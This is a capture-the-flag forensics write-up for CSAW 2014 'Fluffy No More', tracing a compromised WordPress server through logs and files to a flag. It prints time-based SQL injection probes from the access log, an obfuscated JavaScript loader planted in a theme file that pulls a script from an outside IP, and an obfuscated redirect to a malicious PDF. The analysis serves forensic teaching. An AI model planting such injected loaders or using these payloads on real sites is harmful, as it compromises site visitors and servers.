CSAW 2014 :: Forensics 300 :: Fluffy No More

I think forensics challenges are generally horrible no fun zones, but Fluffy No More is actually a fun little scavenger hunt through a filesystem. @brad_anton gives us a tarball of the relevant parts of a compromised webserver – a MySQL database dump, /var/log/ , /var/www/ , and all of /etc/.

Co-credit for this challenge goes to Alex Lynch and Kirk Elifson (@kelifson)!

Upon cursory inspection, we find that we have a comprised WordPress site:

Looking through /var/log/apache2/access.log , we find Python and WPScan making a mess in the logs from a source IP of 192.168.127.137:

192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=sleep%287%29%23 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=1+or+sleep%287%29%23 HTTP/1.1" 301 422 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22+or+sleep%287%29%23 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27+or+sleep%287%29%23 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22+or+sleep%287%29%3D%22 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27+or+sleep%287%29%3D%27 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=1%29+or+sleep%287%29%23 HTTP/1.1" 301 422 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22%29+or+sleep%287%29%3D%22 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27%29+or+sleep%287%29%3D%27 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=1%29%29+or+sleep%287%29%23 HTTP/1.1" 301 422 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22%29%29+or+sleep%287%29%3D%22 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27%29%29+or+sleep%287%29%3D%27 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"

192.168.127.137 - - [16/Sep/2014:20:54:26 +0000] "GET /wp-content/plugins/limit-login-attempts/ HTTP/1.1" 404 493 "http://blog.eyeheartfluffybunnies.com/" "WPScan v2.4.1 (http://wpscan.org)"
192.168.127.137 - - [16/Sep/2014:20:54:26 +0000] "GET /wp-content/plugins/bluetrait-event-viewer/ HTTP/1.1" 404 495 "http://blog.eyeheartfluffybunnies.com/" "WPScan v2.4.1 (http://wpscan.org)"
192.168.127.137 - - [16/Sep/2014:20:54:26 +0000] "POST /wp-login.php HTTP/1.1" 200 4296 "http://blog.eyeheartfluffybunnies.com/" "WPScan v2.4.1 (http://wpscan.org)"

With the goal of not sifting through logs forever, let’s assume the server was rooted. We checked /var/log/auth.log  to find a suspicious modification:

Sep 17 19:20:09 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
Sep 17 19:20:09 ubuntu sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Sep 17 19:20:22 ubuntu sudo: pam_unix(sudo:session): session closed for user root

After jsbeautifying /var/www/html/wp-content/themes/twentythirteen/js/html5.js , we find a suspicious little snippet:

var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");
c = "";
k = "/";
m = f[6];
for (var i = 0; i < f.length; i++) {
    c += f[i].length.toString();
}
v = f[0];
x = "\'ht";
b = f[4];
f = 2541 * 6 - 35 + 46 + 12 - 15269;
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;
c += f.toString();
f = "";
c = c.split("");
var w = 0;
u = "s";
for (var i = 0; i < c.length; i++) {
    if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
        f += String.fromCharCode(46);
        w++;
    }
    f += c[i];
}
i = k + "anal";
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\</" + m + "\>");

Replace document.write with console.log, slap it all in your favorite browser’s Javascript console, and out comes: <script src=’http://128.238.66.100/analytics.js’></script>

Download that, beautify it, and you find this wonderful piece of obfuscated code:

var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);

which is actually

window.open("http://128.238.66.100/announcement.pdf", "_self")

We downloaded that, opened it for a laugh, and then I opened it in Notepad++ to find another PDF inside the PDF.

8 0 obj
<< /Length 212
/Type /EmbeddedFile
/Filter /FlateDecode
/Params << /Size 495
/Checksum <7f0104826bde58b80218635f639b50a9> >>
/Subtype /application#2Fpdf >>
stream
[stuff]

Open announcement.pdf  in the random tool of the day, PDF Stream Dumper, to find some more JavaScript:

Paste that string in a web console, and we get:

“YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}”